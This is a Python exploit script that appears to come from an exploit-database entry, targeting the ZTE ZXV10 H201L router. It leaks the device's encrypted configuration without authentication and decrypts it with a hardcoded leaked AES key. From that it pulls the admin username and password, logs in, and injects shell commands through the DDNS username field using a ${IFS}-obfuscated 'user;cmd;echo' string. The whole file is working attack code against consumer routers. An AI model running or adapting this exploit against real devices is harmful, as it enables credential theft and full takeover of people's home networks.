# Exploit Title: ZTE ZXV10 H201L - RCE via authentication bypass
# Exploit Author: l34n (tasos meletlidis)
# https://i0.rs/blog/finding-0click-rce-on-two-zte-routers/
import http.client, requests, os, argparse, struct, zlib
from io import BytesIO
from os import stat
from Crypto.Cipher import AES
def login(session, host, port, username, password):
login_token = session.get(f"http://{host}:{port}/").text.split("getObj(\"Frm_Logintoken\").value = \"")[1].split("\"")[0]
headers = {
"Content-Type": "application/x-www-form-urlencoded"
}
data = {
"Username": username,
"Password": password,
"frashnum": "",
"Frm_Logintoken": login_token
}
session.post(f"http://{host}:{port}/", headers=headers, data=data)
def logout(session, host, port):
headers = {
"Content-Type": "application/x-www-form-urlencoded"
}
data = {
"logout": "1",
}
session.post(f"http://{host}:{port}/", headers=headers, data=data)
def leak_config(host, port):
conn = http.client.HTTPConnection(host, port)
boundary = "----WebKitFormBoundarysQuwz2s3PjXAakFJ"
body = (
f"--{boundary}\r\n"
'Content-Disposition: form-data; name="config"\r\n'
"\r\n"
"\r\n"
f"--{boundary}--\r\n"
)
headers = {
"Content-Type": f"multipart/form-data; boundary={boundary}",
"Content-Length": str(len(body)),
"Connection": "close",
}
conn.request("POST", "/getpage.gch?pid=101", body, headers)
response = conn.getresponse()
response_data = response.read()
with open("config.bin", "wb") as file:
file.write(response_data)
conn.close()
def _read_exactly(fd, size, desc="data"):
chunk = fd.read(size)
if len(chunk) != size:
return None
return chunk
def _read_struct(fd, fmt, desc="struct"):
size = struct.calcsize(fmt)
data = _read_exactly(fd, size, desc)
if data is None:
return None
return struct.unpack(fmt, data)
def read_aes_data(fd_in, key):
encrypted_data = b""
while True:
aes_hdr = _read_struct(fd_in, ">3I", desc="AES chunk header")
if aes_hdr is None:
return None
_, chunk_len, marker = aes_hdr
chunk = _read_exactly(fd_in, chunk_len, desc="AES chunk data")
if chunk is None:
return None
encrypted_data += chunk
if marker == 0:
break
cipher = AES.new(key.ljust(16, b"\0")[:16], AES.MODE_ECB)
fd_out = BytesIO()
fd_out.write(cipher.decrypt(encrypted_data))
fd_out.seek(0)
return fd_out
def read_compressed_data(fd_in, enc_header):
hdr_crc = zlib.crc32(struct.pack(">6I", *enc_header[:6]))
if enc_header[6] != hdr_crc:
return None
total_crc = 0
fd_out = BytesIO()
while True:
comp_hdr = _read_struct(fd_in, ">3I", desc="compression chunk header")
if comp_hdr is None:
return None
uncompr_len, compr_len, marker = comp_hdr
chunk = _read_exactly(fd_in, compr_len, desc="compression chunk data")
if chunk is None:
return None
total_crc = zlib.crc32(chunk, total_crc)
uncompressed = zlib.decompress(chunk)
if len(uncompressed) != uncompr_len:
return None
fd_out.write(uncompressed)
if marker == 0:
break
if enc_header[5] != total_crc:
return None
fd_out.seek(0)
return fd_out
def read_config(fd_in, fd_out, key):
ver_header_1 = _read_struct(fd_in, ">5I", desc="1st version header")
if ver_header_1 is None:
return
ver_header_2_offset = 0x14 + ver_header_1[4]
fd_in.seek(ver_header_2_offset)
ver_header_2 = _read_struct(fd_in, ">11I", desc="2nd version header")
if ver_header_2 is None:
return
ver_header_3_offset = ver_header_2[10]
fd_in.seek(ver_header_3_offset)
ver_header_3 = _read_struct(fd_in, ">2H5I", desc="3rd version header")
if ver_header_3 is None:
return
signed_cfg_size = ver_header_3[3]
file_size = stat(fd_in.name).st_size
fd_in.seek(0x80)
sign_header = _read_struct(fd_in, ">3I", desc="signature header")
if sign_header is None:
return
if sign_header[0] != 0x04030201:
return
sign_length = sign_header[2]
signature = _read_exactly(fd_in, sign_length, desc="signature")
if signature is None:
return
enc_header_raw = _read_exactly(fd_in, 0x3C, desc="encryption header")
if enc_header_raw is None:
return
encryption_header = struct.unpack(">15I", enc_header_raw)
if encryption_header[0] != 0x01020304:
return
enc_type = encryption_header[1]
if enc_type in (1, 2):
if not key:
return
fd_in = read_aes_data(fd_in, key)
if fd_in is None:
return
if enc_type == 2:
enc_header_raw = _read_exactly(fd_in, 0x3C, desc="second encryption header")
if enc_header_raw is None:
return
encryption_header = struct.unpack(">15I", enc_header_raw)
if encryption_header[0] != 0x01020304:
return
enc_type = 0
if enc_type == 0:
fd_in = read_compressed_data(fd_in, encryption_header)
if fd_in is None:
return
fd_out.write(fd_in.read())
def decrypt_config(config_key):
encrypted = open("config.bin", "rb")
decrypted = open("decrypted.xml", "wb")
read_config(encrypted, decrypted, config_key)
with open("decrypted.xml", "r") as file:
contents = file.read()
username = contents.split("IGD.AU2")[1].split("User")[1].split("val=\"")[1].split("\"")[0]
password = contents.split("IGD.AU2")[1].split("Pass")[1].split("val=\"")[1].split("\"")[0]
encrypted.close()
os.system("rm config.bin")
decrypted.close()
os.system("rm decrypted.xml")
return username, password
def command_injection(cmd):
injection = f"user;{cmd};echo "
injection = injection.replace(" ", "${IFS}")
return injection
def set_ddns(session, host, port, payload):
headers = {
"Content-Type": "application/x-www-form-urlencoded"
}
data = {
"IF_ACTION": "apply",
"IF_ERRORSTR": "SUCC",
"IF_ERRORPARAM": "SUCC",
"IF_ERRORTYPE": -1,
"IF_INDEX": None,
"IFservice_INDEX": 0,
"IF_NAME": None,
"Name": "dyndns",
"Server": "http://www.dyndns.com/",
"ServerPort": None,
"Request": None,
"UpdateInterval": None,
"RetryInterval": None,
"MaxRetries": None,
"Name0": "dyndns",
"Server0": "http://www.dyndns.com/",
"ServerPort0": 80,
"Request0": "",
"UpdateInterval0": 86400,
"RetryInterval0": 60,
"MaxRetries0": 3,
"Name1": "No-IP",
"Server1": "http://www.noip.com/",
"ServerPort1": 80,
"Request1": "",
"UpdateInterval1": 86400,
"RetryInterval1": 60,
"MaxRetries1": 3,
"Name2": "easyDNS",
"Server2": "https://web.easydns.com/",
"ServerPort2": 80,
"Request2": "",
"UpdateInterval2": 86400,
"RetryInterval2": 180,
"MaxRetries2": 5,
"Enable": 1,
"Hidden": None,
"Status": None,
"LastError": None,
"Interface": "IGD.WD1.WCD3.WCIP1",
"DomainName": "hostname",
"Service": "dyndns",
"Username": payload,
"Password": "password",
"Offline": None,
"HostNumber": ""
}
session.post(f"http://{host}:{port}/getpage.gch?pid=1002&nextpage=app_ddns_conf_t.gch", headers=headers, data=data)
def pwn(config_key, host, port):
session = requests.Session()
leak_config(host, port)
username, password = decrypt_config(config_key)
login(session, host, port, username, password)
shellcode = "echo hacked>/var/tmp/pwned"
payload = command_injection(shellcode)
set_ddns(session, host, port, payload)
logout(session, host, port)
print("[+] PoC complete")
def main():
parser = argparse.ArgumentParser(description="Run remote command on ZTE ZXV10 H201L")
parser.add_argument("--config_key", type=lambda x: x.encode(), default=b"Renjx%2$CjM", help="Leaked config encryption key from cspd")
parser.add_argument("--host", required=True, help="Target IP address of the router")
parser.add_argument("--port", required=True, type=int, help="Target port of the router")
args = parser.parse_args()
pwn(args.config_key, args.host, args.port)
if __name__ == "__main__":
main()